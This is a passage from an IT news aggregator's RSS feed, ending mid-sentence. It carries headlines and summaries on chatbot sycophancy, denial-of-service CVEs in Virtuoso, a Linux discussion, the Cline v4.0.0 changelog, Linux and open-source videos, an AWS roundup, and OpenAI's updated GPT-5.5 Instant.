<description><![CDATA[People use AI chatbots for company, advice, and emotional support, and these systems answer in ways meant to hold their attention. Researchers describe the resulting risks as affective safety, a class of harm that exists because humans are emotional beings and because the systems engage directly ...]]></description>
<link>https://tsecurity.de/de/3631991/it-security-nachrichten/sycophantic-chatbots-and-the-harms-that-build-over-many-chats/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3631991/it-security-nachrichten/sycophantic-chatbots-and-the-harms-that-build-over-many-chats/</guid>
<pubDate>Mon, 29 Jun 2026 07:24:02 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>People use AI chatbots for company, advice, and emotional support, and these systems answer in ways meant to hold their attention. Researchers describe the resulting risks as affective safety, a class of harm that exists because humans are emotional beings and because the systems engage directly with that emotional life. The damage happens during ordinary use, with no breach and no intruder. These systems work as designed, optimizing for the goals their builders set, and … <a href="https://www.helpnetsecurity.com/2026/06/29/sycophantic-chatbots-affective-ai-safety/" rel="nofollow">More <span class="meta-nav">→</span></a></p>
<p>The post <a href="https://www.helpnetsecurity.com/2026/06/29/sycophantic-chatbots-affective-ai-safety/">Sycophantic chatbots and the harms that build over many chats</a> appeared first on <a href="https://www.helpnetsecurity.com/">Help Net Security</a>.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2025-61028 | openlink virtuoso-opensource 7.2.11 denial of service (Issue 1233)]]></title>
<description><![CDATA[A vulnerability, which was classified as problematic, was found in openlink virtuoso-opensource 7.2.11. This impacts an unknown function. The manipulation results in denial of service.

This vulnerability is cataloged as CVE-2025-61028. The attack may be launched remotely. There is no exploit ava...]]></description>
<link>https://tsecurity.de/de/3629760/sicherheitsluecken/cve-2025-61028-openlink-virtuoso-opensource-7211-denial-of-service-issue-1233/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3629760/sicherheitsluecken/cve-2025-61028-openlink-virtuoso-opensource-7211-denial-of-service-issue-1233/</guid>
<pubDate>Sat, 27 Jun 2026 16:38:37 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability, which was classified as <a href="https://vuldb.com/kb/risk">problematic</a>, was found in <a href="https://vuldb.com/product/openlink:virtuoso-opensource">openlink virtuoso-opensource 7.2.11</a>. This impacts an unknown function. The manipulation results in denial of service.

This vulnerability is cataloged as <a href="https://vuldb.com/cve/CVE-2025-61028">CVE-2025-61028</a>. The attack may be launched remotely. There is no exploit available.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2025-61019 | openlink virtuoso-opensource 7.2.11 sqlo_key_part_best denial of service (Issue 1222)]]></title>
<description><![CDATA[A vulnerability identified as problematic has been detected in openlink virtuoso-opensource 7.2.11. This affects an unknown part of the component sqlo_key_part_best. The manipulation leads to denial of service.

This vulnerability is uniquely identified as CVE-2025-61019. The attack is possible t...]]></description>
<link>https://tsecurity.de/de/3629756/sicherheitsluecken/cve-2025-61019-openlink-virtuoso-opensource-7211-sqlokeypartbest-denial-of-service-issue-1222/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3629756/sicherheitsluecken/cve-2025-61019-openlink-virtuoso-opensource-7211-sqlokeypartbest-denial-of-service-issue-1222/</guid>
<pubDate>Sat, 27 Jun 2026 16:38:32 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability identified as <a href="https://vuldb.com/kb/risk">problematic</a> has been detected in <a href="https://vuldb.com/product/openlink:virtuoso-opensource">openlink virtuoso-opensource 7.2.11</a>. This affects an unknown part of the component <em>sqlo_key_part_best</em>. The manipulation leads to denial of service.

This vulnerability is uniquely identified as <a href="https://vuldb.com/cve/CVE-2025-61019">CVE-2025-61019</a>. The attack is possible to be carried out remotely. No exploit exists.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2025-61023 | openlink virtuoso-opensource 7.2.11 denial of service (Issue 1230)]]></title>
<description><![CDATA[A vulnerability classified as problematic has been found in openlink virtuoso-opensource 7.2.11. The affected element is an unknown function. Performing a manipulation results in denial of service.

This vulnerability is identified as CVE-2025-61023. The attack can be initiated remotely. There is...]]></description>
<link>https://tsecurity.de/de/3629754/sicherheitsluecken/cve-2025-61023-openlink-virtuoso-opensource-7211-denial-of-service-issue-1230/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3629754/sicherheitsluecken/cve-2025-61023-openlink-virtuoso-opensource-7211-denial-of-service-issue-1230/</guid>
<pubDate>Sat, 27 Jun 2026 16:38:30 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability classified as <a href="https://vuldb.com/kb/risk">problematic</a> has been found in <a href="https://vuldb.com/product/openlink:virtuoso-opensource">openlink virtuoso-opensource 7.2.11</a>. The affected element is an unknown function. Performing a manipulation results in denial of service.

This vulnerability is identified as <a href="https://vuldb.com/cve/CVE-2025-61023">CVE-2025-61023</a>. The attack can be initiated remotely. There is not any exploit available.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2025-61021 | openlink virtuoso-opensource 7.2.11 sqlo_natural_join_cond denial of service (Issue 1223)]]></title>
<description><![CDATA[A vulnerability marked as problematic has been reported in openlink virtuoso-opensource 7.2.11. This issue affects some unknown processing of the component sqlo_natural_join_cond. This manipulation causes denial of service.

The identification of this vulnerability is CVE-2025-61021. It is possib...]]></description>
<link>https://tsecurity.de/de/3629753/sicherheitsluecken/cve-2025-61021-openlink-virtuoso-opensource-7211-sqlonaturaljoincond-denial-of-service-issue-1223/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3629753/sicherheitsluecken/cve-2025-61021-openlink-virtuoso-opensource-7211-sqlonaturaljoincond-denial-of-service-issue-1223/</guid>
<pubDate>Sat, 27 Jun 2026 16:38:28 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability marked as <a href="https://vuldb.com/kb/risk">problematic</a> has been reported in <a href="https://vuldb.com/product/openlink:virtuoso-opensource">openlink virtuoso-opensource 7.2.11</a>. This issue affects some unknown processing of the component <em>sqlo_natural_join_cond</em>. This manipulation causes denial of service.

The identification of this vulnerability is <a href="https://vuldb.com/cve/CVE-2025-61021">CVE-2025-61021</a>. It is possible to initiate the attack remotely. There is no exploit available.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2025-61027 | openlink virtuoso-opensource 7.2.11 denial of service (Issue 1232)]]></title>
<description><![CDATA[A vulnerability, which was classified as problematic, has been found in openlink virtuoso-opensource 7.2.11. This affects an unknown function. The manipulation leads to denial of service.

This vulnerability is listed as CVE-2025-61027. The attack may be initiated remotely. There is no available ...]]></description>
<link>https://tsecurity.de/de/3629752/sicherheitsluecken/cve-2025-61027-openlink-virtuoso-opensource-7211-denial-of-service-issue-1232/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3629752/sicherheitsluecken/cve-2025-61027-openlink-virtuoso-opensource-7211-denial-of-service-issue-1232/</guid>
<pubDate>Sat, 27 Jun 2026 16:38:27 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability, which was classified as <a href="https://vuldb.com/kb/risk">problematic</a>, has been found in <a href="https://vuldb.com/product/openlink:virtuoso-opensource">openlink virtuoso-opensource 7.2.11</a>. This affects an unknown function. The manipulation leads to denial of service.

This vulnerability is listed as <a href="https://vuldb.com/cve/CVE-2025-61027">CVE-2025-61027</a>. The attack may be initiated remotely. There is no available exploit.]]></content:encoded>
</item>
<item>
<title><![CDATA[Veterans of Linux: what's one thing that "just works" today that would've sounded impossible 15–20 years ago?]]></title>
<description><![CDATA[I was thinking about how much time people used to spend fighting thier hardware instead of actually using their computers. Graphics drivers, Wi-Fi, suspend/resume, audio... it felt like there was always something that could randomly stop working after an update. Fast forward to now, and i'm seein...]]></description>
<link>https://tsecurity.de/de/3629717/linux-tipps/veterans-of-linux-whats-one-thing-that-just-works-today-that-wouldve-sounded-impossible-15-20-years-ago/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3629717/linux-tipps/veterans-of-linux-whats-one-thing-that-just-works-today-that-wouldve-sounded-impossible-15-20-years-ago/</guid>
<pubDate>Sat, 27 Jun 2026 16:08:54 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<!-- SC_OFF --><div class="md"><p>I was thinking about how much time people used to spend fighting thier hardware instead of actually using their computers.</p> <p>Graphics drivers, Wi-Fi, suspend/resume, audio... it felt like there was always something that could randomly stop working after an update.</p> <p>Fast forward to now, and i'm seeing people run GPU passthrough, local AI models, gaming, video editing, containers, VMs... all on the same machine withoutt thinking twice.</p> <p>It made me wonder:</p> <p>What's the one moment where you looked at your setup and thought, "Huh... Linux has come a long way."</p> <p>Doesnt have to be anything huge. Could be a driver that finally stopped being a headache, a laptop that worked perfectly out of the box, or just realizing you haven't had to troubleshoot somthing in months.</p> <p>I'm curious what everyone else's "we've finally made it" moment was.</p> <p>Cuz really... We've made far despite everything.. </p> </div><!-- SC_ON -->   submitted by   <a href="https://www.reddit.com/user/dev_kay47"> /u/dev_kay47 </a> <br> <span><a href="https://www.reddit.com/r/linux/comments/1ugyf56/veterans_of_linux_whats_one_thing_that_just_works/">[link]</a></span>   <span><a href="https://www.reddit.com/r/linux/comments/1ugyf56/veterans_of_linux_whats_one_thing_that_just_works/">[comments]</a></span>]]></content:encoded>
</item>
<item>
<title><![CDATA[v4.0.0]]></title>
<description><![CDATA[Added

Add the SDK-backed VS Code extension runtime. Cline now runs tasks through the shared Cline SDK session layer for agent turns, tools, Plan/Act mode coordination, MCP, checkpoints, telemetry, provider changes, compaction, mistake limits, and task history.
Add ClinePass to the VS Code extens...]]></description>
<link>https://tsecurity.de/de/3628503/downloads/v400/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3628503/downloads/v400/</guid>
<pubDate>Fri, 26 Jun 2026 22:16:57 +0200</pubDate>
<category>💾 Downloads</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<h3>Added</h3>
<ul>
<li>Add the SDK-backed VS Code extension runtime. Cline now runs tasks through the shared Cline SDK session layer for agent turns, tools, Plan/Act mode coordination, MCP, checkpoints, telemetry, provider changes, compaction, mistake limits, and task history.</li>
<li>Add ClinePass to the VS Code extension, including onboarding, provider selection, signup and subscription handoff, live model lists, entitlement and organization error states, out-of-credit prompts, and clearer ClinePass auth/error handling.</li>
<li>Add the Customize marketplace for discovering and managing Skills, MCP servers, and Plugins from the extension, including installed/marketplace tabs, search and filtering, install/uninstall flows, enable/disable controls, and support for plugin-bundled skills.</li>
<li>Cline Plugins: Plugins let you extend Cline with custom tools, workflows, skills, and MCP-powered capabilities tailored to your team or project. Install them from the new Customize marketplace to add specialized behavior, connect external services, and package reusable automations—so Cline can do more than code: it can adapt to the way you work.</li>
<li>Add queued prompts in chat. Messages submitted while Cline is already working are now queued, shown while the current turn streams, and can be cancelled before they run.</li>
<li>Add edit-and-regenerate support for previous user messages, with clearer Reset Chat and Reset Code actions.</li>
<li>Add generic SDK provider settings and model-catalog support so more providers can share the same model picker, reasoning controls, dynamic model IDs, provider config persistence, and custom model handling.</li>
<li>Add additional SDK-backed provider exposure and model/provider updates, including ClinePass models, refreshed Cline catalog data, Fireworks GLM 5.2, Kimi K2.6 Fast, Kimi K2.7 Code, Qwen 3.7 Plus, MiniMax M3 updates, SAP AI Core wiring, LiteLLM model fetching, Codex OAuth credentials, and OpenAI-compatible model settings.</li>
<li>Add MCP support for plugins and shared marketplace install/uninstall plumbing used by the VS Code extension.</li>
</ul>
<h3>Changed</h3>
<ul>
<li>Migrate the VS Code extension from the legacy task implementation to the shared Cline SDK and move the extension build/package workflow to Bun.</li>
<li>Rework Plan/Act mode handling through SDK coordinators, including closer CLI parity and automatic continuation when switching from Plan to Act.</li>
<li>Rework provider and model configuration around <code>providers.json</code>, the model catalog, and SDK session config so settings are preserved consistently across provider switches and active sessions can restart when the selected provider changes.</li>
<li>Simplify provider settings UI by replacing many provider-specific views with shared generic settings components and consistent reasoning selectors.</li>
<li>Simplify terminal execution through the SDK run-commands path, including clearer non-interactive command guidance and safer structured command formatting.</li>
<li>Migrate legacy MCP files and formats into the shared settings file and protect MCP settings writes with safer locking/atomic updates.</li>
<li>Refresh the MCP hub automatically after marketplace installs so newly installed servers are available without a manual restart.</li>
<li>Reorganize MCP/Skills/Plugins entry points under Customize, hide workflows from the Customize menu, wrap Customize tabs on narrow screens, and allow the MCP Marketplace tab to be disabled remotely while installed MCP servers remain accessible.</li>
<li>Simplify auto-approval settings. Command auto-approval is now disabled by default for safer new and reset configurations, and the auto-approval UI has been streamlined.</li>
<li>Update task history handling for the SDK migration, including legacy task history visibility, metadata preservation on resume, and corrected deletion behavior.</li>
<li>Route compacting and mistake-limit behavior through the SDK so the Compact button and mistake tracking affect the active SDK session.</li>
<li>Remove the legacy Explain Changes feature as part of the SDK migration cleanup.</li>
<li>Temporarily disable subagents in the VS Code extension while the SDK-backed experience is stabilized.</li>
</ul>
<h3>Fixed</h3>
<ul>
<li>Fix marketplace edge cases, including refreshing MCP servers after marketplace installs, disabling the MCP Marketplace tab from remote config, hiding workflows from Customize, surfacing plugin-bundled skills, and uninstalling shared marketplace entries.</li>
<li>Fix chat submission during active turns by queuing user messages instead of dropping or racing them, showing pending/queued states promptly, rendering direct user messages immediately, and removing delayed send behavior.</li>
<li>Fix editing previous user messages so Escape cancels editing locally and reset action labels are clearer.</li>
<li>Fix terminal reliability, including standalone Windows output capture, hardened PowerShell command handling, running-state display for in-progress commands, raw structured command preservation, single-quote handling, cwd setup timeouts, failing-command stdout capture, heredoc coalescing, and removal of duplicated command echoes in tool results.</li>
<li>Fix SDK tool-result and provider-message budgeting by truncating large tool outputs by default, capping assistant text, limiting bash/file-read/search output ingestion, bounding media budgets, batching outdated-read rewrites to preserve provider prefix caches, and normalizing JSON-like tool inputs by schema.</li>
<li>Fix login and feature-flag resolution by using the correct user/account identity on startup and simplifying the login UX.</li>
</ul>
<p><strong>Full Changelog</strong>: <a class="commit-link" href="https://github.com/cline/cline/compare/v3.89.2...v4.0.0"><tt>v3.89.2...v4.0.0</tt></a></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Installation und Einführung von Zorin OS - Tutorial für Anfänger]]></title>
<description><![CDATA[Author: Linux Guides - Bewertung: 10x - Views:96 In diesem Video zeigt Jean, wie man Zorin OS parallel zu Windows installiert und so optimal mit Linux durchstarten kann.
Wenn Du das Video unterstützen willst, dann gib bitte eine Bewertung ab, und schreibe einen Kommentar. Vielen Dank!

Links:
---...]]></description>
<link>https://tsecurity.de/de/3627596/linux-tipps/installation-und-einfuehrung-von-zorin-os-tutorial-fuer-anfaenger/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3627596/linux-tipps/installation-und-einfuehrung-von-zorin-os-tutorial-fuer-anfaenger/</guid>
<pubDate>Fri, 26 Jun 2026 15:40:47 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: Linux Guides - Bewertung: 10x - Views:96 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/cvTboRfwl3E?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>In diesem Video zeigt Jean, wie man Zorin OS parallel zu Windows installiert und so optimal mit Linux durchstarten kann.<br />
Wenn Du das Video unterstützen willst, dann gib bitte eine Bewertung ab, und schreibe einen Kommentar. Vielen Dank!<br />
<br />
Links:<br />
-------------------------------------<br />
Falls sich die Windows-Partition nicht ausreichend verkleinern lässt, liegt dies oft an der Auslagerungsdatei. Hilfe dazu findet man z.B. in verschiedenen Foren: https://forum.linuxguides.de/index.php?thread/10697-windows-partition-l%C3%A4sst-sich-nicht-verkleinern/<br />
<br />
- ZorinOS herunterladen: https://zorin.com/os/download/<br />
- https://rufus.ie/de/<br />
- ehrenamtliche Hilfe durch die Linux Helden: https://www.linuxguides.de/linux-helden-karte/<br />
- Du suchst eine gute Cloud Lösung? https://www.libre-workspace.org/cloud/<br />
- Linux Assistant: https://www.linux-assistant.org/<br />
<br />
Videoempfehlungen:<br />
- Alles zur Firewall: https://youtu.be/gSq1W3qfKBs<br />
- LibreOffice Writer einrichten wie Microsoft Word: https://youtu.be/Hms467GhynE<br />
- Crashkurs zu Writer (Word Alternative): https://youtu.be/QyakKLNv7Yg<br />
- Crashkurs zu Calc (Excel Alternative): https://youtu.be/ioAxN27CIUA<br />
- Thunderbird Tutorial (Mailclient): https://youtu.be/eAgCsvQV7ZE<br />
- Windows in einer Box: https://youtu.be/CAditqMhYrA<br />
<br />
- Linux-Guides Merch*: https://linux-guides.myspreadshop.de/<br />
- Professioneller Linux Support*: https://www.linuxguides.de/linux-support/<br />
- Linux-Arbeitsplatz für KMU & Einzelpersonen*: https://www.linuxguides.de/linux-arbeitsplatz/<br />
- Linux Mint Kurs für Anwender*: https://www.linuxguides.de/kurs-linux-mint-fur-anwender/<br />
- Offizielle Webseite: https://www.linuxguides.de<br />
- Forum: https://forum.linuxguides.de/<br />
- Unterstützen: http://unterstuetzen.linuxguides.de<br />
- Mastodon: https://mastodon.social/@LinuxGuides<br />
- X: https://twitter.com/LinuxGuides<br />
- Instagram: https://www.instagram.com/linuxguides/<br />
- Kontakt: https://www.linuxguides.de/kontakt/<br />
<br />
Inhaltsverzeichnis:<br />
-------------------------------------<br />
00:00 Begrüßung<br />
00:44 ZorinOS und Rufus herunterladen<br />
02:19 Festplattenkonfiguration ändern<br />
03:41 Abbild auf USB-Stick erstellen<br />
07:10 Hilfe durch Linux Helden<br />
08:33 Vom USB-Stick starten<br />
09:55 Installation<br />
14:14 Willkommensbildschirm<br />
17:48 Treiber, Firewall<br />
20:15 Software installieren<br />
26:20 Einstellungen<br />
30:12 Dateimanager<br />
32:36 Finale Hinweise<br />
37:55 Verabschiedung<br />
<br />
Haftungsausschluss:<br />
-------------------------------------<br />
Das Video dient lediglich zu Informationszwecken. Wir übernehmen keinerlei Haftung für in diesem Video gezeigte und / oder erklärte Handlungen. Es entsteht in keinem Moment Anspruch auf Schadensersatz oder ähnliches.<br />
<br />
*) Werbung<br />
<br />
#linuxguides #zorinos #linux #opensource<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[🚨 Die Milliarden-Lüge des Staates: Wie wir unsere digitale Freiheit an US-Konzerne verkaufen 💸]]></title>
<description><![CDATA[Author: VAZULES Analysiert - Bewertung: 0x - Views:3 *▶️ IT Beschaffung:* Stell dir vor, du mietest eine Wohnung, aber der Vermieter behält alle Schlüssel und baut Kameras ein. Exakt so agiert unser Staat seit Jahrzehnten bei der IT-Beschaffung. Dieses Erklärvideo dekonstruiert die staatliche IT-...]]></description>
<link>https://tsecurity.de/de/3626588/it-security-nachrichten/die-milliarden-luege-des-staates-wie-wir-unsere-digitale-freiheit-an-us-konzerne-verkaufen/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3626588/it-security-nachrichten/die-milliarden-luege-des-staates-wie-wir-unsere-digitale-freiheit-an-us-konzerne-verkaufen/</guid>
<pubDate>Fri, 26 Jun 2026 09:23:14 +0200</pubDate>
<category>📰 IT Security Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>Author: VAZULES Analysiert - Bewertung: 0x - Views:3 <br/></p><p><iframe id="ytplayer" loading="lazy" type="text/html" width="100%" height="auto" src="https://www.youtube.com/embed/YEg6CwfVr8M?autoplay=1&origin=http://tsecurity.de" frameborder="0"></iframe></p><p>*▶️ IT Beschaffung:* Stell dir vor, du mietest eine Wohnung, aber der Vermieter behält alle Schlüssel und baut Kameras ein. Exakt so agiert unser Staat seit Jahrzehnten bei der IT-Beschaffung. Dieses Erklärvideo dekonstruiert die staatliche IT-Infrastruktur aus einer linksprogressiven Perspektive und fordert: "Öffentliches Geld, Öffentlicher Code"!<br />
<br />
*Wir entlarven die Falle der US-Tech-Monopole:* Die Abhängigkeitsfalle geschlossener Systeme zwingt den Staat, den Überwachungskapitalismus des Silicon Valley mit unseren Steuergeldern zu finanzieren (permanenter Abfluss von Telemetriedaten). Durch US-Datengesetze haben ausländische Konzerne faktisch einen "Not-Aus-Schalter" für unsere kritische Infrastruktur.<br />
<br />
*Wir beleuchten das Machtversagen der IT-Sicherheit:* Milliardenkonzerne machen Profit mit kostenloser Basis-Software, während die Sicherheit des Internets auf den Schultern unbezahlter, überarbeiteter freiwilliger Entwickler ruht. Das Resultat sind verheerende Angriffe auf die digitale Lieferkette. <br />
<br />
*Das Jahr 2026 bringt die Wende:* Digitale Zutatenlisten (SBoM) werden rechtlich bindend. Der Staat investiert in digitale Allmendegüter und offene Standards (Open Desk), um die Datensouveränität der Bürger zu garantieren und das Steuergeld endlich in der heimischen Wirtschaft zu halten. Wir fordern den genossenschaftlichen Wohnraum im Netz! ✊<br />
<br />
---Thema:<br />
🛑 DIE CODE-REBELLION: Wem gehört unsere Infrastruktur? 💶<br />
<br />
*Kernaussage:*<br />
<br />
* *📉 Die Monopol-Falle:* Geschlossene Systeme von US-Konzernen schaffen eine massive strukturelle Abhängigkeitsfalle. Behörden funken massenhaft Daten ab – der Steuerzahler finanziert seine eigene Entmündigung.<br />
<br />
* *🧠 Die Souveränitäts-Krise:* Gesetze wie der "US Cloud Act" zwingen Anbieter zur Datenherausgabe. Die EU blockiert dies ab 2026, da kein Drittstaat einen "Not-Aus-Schalter" über europäische Infrastruktur haben darf.<br />
<br />
* *⚖️ Ausbeutung der Freiwilligen:* Das Prinzip "Viele Augen finden jeden Fehler" scheitert an der Profitgier. Milliarden-Konzerne nutzen kostenlose Basis-Software, während die IT-Sicherheit von unbezahlten Freiwilligen getragen wird (Folge: massive Hackerangriffe auf Lieferketten). Ab 2026 investiert der Staat (17 Mio. Euro Budget) in diese Wartung.<br />
<br />
* *🌍 Algorithmen aus der Dunkelkammer:* Geschlossene Codes verhindern die Prüfung auf strukturelle Diskriminierung (Beispiel Sozialleistungen). Vorbilder wie Barcelona zeigen, wie offene Systeme die Bürger schützen.<br />
<br />
* *🛡️ Der Wendepunkt 2026:* Digitale Souveränität wird Vergabekriterium. Durch offene Arbeitsplatz-Suiten (bereits 70.000 Nutzer) amortisieren sich die Kosten nach 12-15 Monaten. Das Steuergeld fließt an lokale Mittelständler statt ins Silicon Valley.<br />
<br />
*1. ✊ GEMEINSAM GEGEN DIE IT-MONOPOLE:*<br />
    KANAL ABONNIEREN: @vazules <br />
<br />
#OpenSource #Systemkritik #ITSicherheit #Politik #Wirtschaft #Digitalisierung #Klassenkampf #LaKanDoR<br/></p>]]></content:encoded>
</item>
<item>
<title><![CDATA[AWS Weekly Roundup: NY Summit recap, Local Zone in Hanoi, Grok 4.3 in Bedrock, price reductions, and more (June 22, 2026)]]></title>
<description><![CDATA[Last week AWS Summit New York City brought together thousands of customers, partners, and builders for a free, one-day event showcasing the latest in cloud and AI innovation. Dr. Swami Sivasubramanian, VP of Agentic AI at AWS unveiled a stack of AI launches in his keynote, all built around one th...]]></description>
<link>https://tsecurity.de/de/3626208/ai-nachrichten/aws-weekly-roundup-ny-summit-recap-local-zone-in-hanoi-grok-43-in-bedrock-price-reductions-and-more-june-22-2026/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3626208/ai-nachrichten/aws-weekly-roundup-ny-summit-recap-local-zone-in-hanoi-grok-43-in-bedrock-price-reductions-and-more-june-22-2026/</guid>
<pubDate>Fri, 26 Jun 2026 05:03:26 +0200</pubDate>
<category>🔧 AI Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Last week AWS Summit New York City brought together thousands of customers, partners, and builders for a free, one-day event showcasing the latest in cloud and AI innovation. Dr. Swami Sivasubramanian, VP of Agentic AI at AWS unveiled a stack of AI launches in his keynote, all built around one thesis: agents that compound value […]]]></content:encoded>
</item>
<item>
<title><![CDATA[OpenAI's updated GPT-5.5 Instant is better at shopping, complex constraints, and understanding user intent  — and it's already in the API]]></title>
<description><![CDATA[OpenAI has made a significant update to its most widely used language model, GPT-5.5 Instant, which is the default in the free version of ChatGPT. The company announced the upgraded version of GPT-5.5 Instant yesterday on X, calling it "much more fun to talk to" and saying it is "better at unders...]]></description>
<link>https://tsecurity.de/de/3625428/it-nachrichten/openais-updated-gpt-55-instant-is-better-at-shopping-complex-constraints-and-understanding-user-intent-and-its-already-in-the-api/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3625428/it-nachrichten/openais-updated-gpt-55-instant-is-better-at-shopping-complex-constraints-and-understanding-user-intent-and-its-already-in-the-api/</guid>
<pubDate>Thu, 25 Jun 2026 19:18:02 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>OpenAI has made a <a href="https://help.openai.com/en/articles/6825453-chatgpt-release-notes">significant update to its most widely used language model, GPT-5.5 Instant,</a> which is the default in the free version of ChatGPT. </p><p>The company announced the <a href="https://x.com/OpenAI/status/2069843083701915755">upgraded version of GPT-5.5 Instant</a> yesterday on X, calling it "much more fun to talk to" and saying it is "better at understanding the intent behind a question and adapting its response accordingly," as well as offering improvements in shopping results, local recommendations, and handling "complex constraints."</p><p>However, it has not yet provided any benchmarks or numerical results to quantify these claims. </p><p>The company said the updated GPT-5.5 Instant was rolling out first to paid ChatGPT subscribers and then to free users as of today, June 25. </p><p>OpenAI also updated its <a href="https://developers.openai.com/api/docs/models/chat-latest">chat-latest API alias</a>, which points to the latest GPT-5.5 Instant model currently used in ChatGPT, while continuing to recommend the separate <code>gpt-5.5</code> model for production API usage.</p><p>That distinction matters, but it should not obscure the main news: this is primarily a ChatGPT-side update to GPT-5.5 Instant, not a new release of the broader GPT-5.5 API model family.</p><p>Let's dig into what's changed...</p><h2><b>Origins of GPT-5.5 Instant, and why OpenAI updated it less than two months later</b></h2><p><a href="https://openai.com/index/gpt-5-5-instant/">GPT-5.5 Instant was first unveiled</a> in early May 2026, just under two months ago, to replace the aging GPT-5.3 Instant engine as the baseline default model for ChatGPT users.</p><p>Developed as a fast, high-throughput variant of OpenAI’s core flagship model family, the initial spring release focused heavily on correcting systemic factuality deficits.</p><p>Internal benchmarks from that spring deployment reported a 52.5% reduction in hallucinated claims compared to GPT-5.3 Instant on high-stakes medical, legal, and financial prompts, alongside a 37.3% drop in factual error rates on user-flagged historical conversations.</p><p>Independent evaluators noted that its predecessor, GPT-5.3 Instant, had struggled in public rankings, placing 44th overall in Arena benchmarks. That gave the May rollout a clear purpose: OpenAI needed a stronger default model for everyday ChatGPT interactions, not just a more capable frontier model for advanced users.</p><p>Stylistically, the initial spring model introduced a sharper conversational baseline, demonstrating a 30.2% reduction in word count and a 29.2% drop in line usage over typical advice prompts.</p><p>However, the spring deployment also introduced an operational fault line for enterprise software systems: a feature known as "memory sources." Designed to grant users visibility into the specific past chats, files, and connected Gmail accounts shaping a personalized answer, memory sources introduced a loose, model-reported observability layer.</p><p>As reported by <a href="https://venturebeat.com/orchestration/gpt-5-5-instant-shows-you-what-it-remembered-just-not-all-of-it">VentureBeat</a>, these internal summaries frequently clashed with the deterministic logs of localized vector databases and enterprise Retrieval-Augmented Generation (RAG) pipelines.</p><p>The resulting friction created dual, competing context records, making it difficult for administrators to reconcile what the model claimed it referenced against what it actually accessed in production.</p><p>The June 24 update does not appear to expand memory sources directly. Instead, it focuses on making GPT-5.5 Instant better at understanding user intent, carrying context across turns, following multi-part instructions, and producing more useful shopping and local recommendations.</p><h2><b>A smarter, more 'fun' ChatGPT for consumers</b></h2><p>For everyday users of ChatGPT, the most noticeable change in GPT-5.5 Instant will be the model’s improved intent recognition.</p><p>According to OpenAI’s latest release notes, GPT-5.5 Instant has improved at identifying the underlying goal behind a user's question, particularly in decision-support scenarios like planning, shopping, asking for advice, researching options and comparing local choices.</p><p>Historically, large language models have struggled when given prompts with multiple overlapping constraints — often dropping one or two requirements in favor of a generalized response.</p><p>The updated GPT-5.5 Instant handles these complex instructions more reliably. When users push back on an answer, clarify their meaning, or introduce new constraints mid-conversation, the model should adapt dynamically rather than stubbornly repeating its original approach.</p><p>This contextual awareness extends heavily into commerce and local recommendations. GPT-5.5 Instant now makes better use of location context to surface nearby options, weaving together product recommendations, business information, and relevant images into a more cohesive output when those elements are useful.</p><p>Furthermore, OpenAI notes that the stylistic formatting of these responses is less rigidly templated, trading robotic lists for a more intentionally designed, warmer and restrained conversational tone.</p><h2><b>Developers can test the latest Instant behavior through </b><code><b>chat-latest</b></code></h2><p>For the developer ecosystem, the June 24 GPT-5.5 Instant update is accessible through OpenAI’s updated <code>chat-latest</code> API alias.</p><p><code>chat-latest</code> is not the same thing as the production <code>gpt-5.5</code> model slug. OpenAI says <code>chat-latest</code> points to the latest Instant model currently used in ChatGPT, and it recommends the separate <code>gpt-5.5</code> model for production API usage. Developers can use <code>chat-latest</code> to test the newest ChatGPT-style improvements, while using <code>gpt-5.5</code> when they need a stable production target.</p><p>The current <code>chat-latest</code> model page lists a 400,000-token context window and support for up to 128,000 maximum output tokens. Its knowledge cutoff is Aug. 31, 2025.</p><p>On pricing, <code>chat-latest</code> uses the same $5.00 per 1 million input tokens and $30.00 per 1 million output tokens listed on its model page. Cached inputs cost $0.50 per 1 million tokens, a 90% discount that strongly incentivizes developers to optimize prompts by placing static instructions first and dynamic data later.</p><p>The model supports text and image input, text output, streaming, function calling and 